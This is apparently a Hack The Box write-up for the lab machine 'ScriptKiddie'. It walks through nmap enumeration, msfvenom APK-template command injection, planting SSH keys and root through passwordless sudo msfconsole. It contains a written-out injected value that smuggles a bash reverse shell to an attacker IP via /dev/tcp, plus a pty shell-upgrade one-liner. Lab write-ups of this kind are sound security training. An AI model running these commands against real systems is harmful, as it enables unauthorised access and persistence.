Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "10.129.76.86 scriptkiddie.htb" >> /etc/hosts
Okay now onto the hacking!
As always, I started off with an NMAP scan against the machine.
nmap -Pn -sC -sV -A -p- -oN initial scriptkiddie.htb
┌──(root💀kali)-[/home/…/boxes/htb/machines/scriptkiddie] └─# nmap -Pn -sC -sV -A -p- -oN initial scriptkiddie.htb Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-10 09:26 EST Nmap scan report for scriptkiddie.htb (10.129.76.86) Host is up (0.24s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA) | 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA) |_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519) 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) |_http-server-header: Werkzeug/0.16.1 Python/3.8.5 |_http-title: k1d'5 h4ck3r t00l5
Scanning & Enumeration
Based on the scan that was run, I realized that port 5000 was running a web server. Thus, I went to investigate and this was what I ended up with!
Its some kind of toolkit running on a Linux based box giving the user access to
h4ck3r t00l5. My next action was to look at how I can abuse this to gain a reverse shell on the remote machine.
After trying out various methods such as uploading reverse shells and intercepting requests to try and find something interesting, I landed on this.
MSF Venom had a vulnerability where you could perform command injection while providing a APK template to generate payload. This site did allow me to generate my own payload using MSF Venom.
Upon finding this exploit, I fired up MSF console to generate an APK template to upload and gain reverse shell on the target box. [Link to MSF Module]
Followed by that I went ahead and uploaded the APK "Template file" onto the site's payload section and opened up a Netcat listener on my end to catch any incoming shells.
Once I hit the generate button, my listener successfully caught a reverse shell from the remote machine which I then proceeded to stabilize with the following python mini-script...
python3 -c 'import pty; pty.spawn("/bin/bash")'
Since I discovered that SSH was running on the server, I generated a new pair of SSH keys and placed the public key on the remote machine!
This allowed me to then SSH into the machine as the
kid user without any password authentication.
Privilege Escalation [Level 1]
Looking around the FS, I realized that there was another user named
pwn and in the user's home directory lived a shell script.
This shell script seemed to read IPs from a file located at
kid's (the user I currently own) home directory and run a
NMAP scan against it. This script was also owned by the
My theory was to somehow invoke an entry into the file which would help escape the
NMAP command and run bash to gain a reverse shell to the
pwn user account!
[email protected]:~/logs$ echo "NEEPOC ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.153/9876 0>&1' #" >> hackers
And I was able to gain a shell! I then proceeded to do the same thing with the SSH keys and stabilize my shell.
Privilege Escalation [Level 2]
Lastly, the path to gain root access to the machine was pretty straight forward. I first ran
sudo -l to figure out what binaries I was able to run as root.
This revealed that I was able to run
MSF Console with root privileges without any password. Thus, I abused this and invoked
/bin/bash after running
MSF Console with root privileges.
And that's it, I was able to root this box!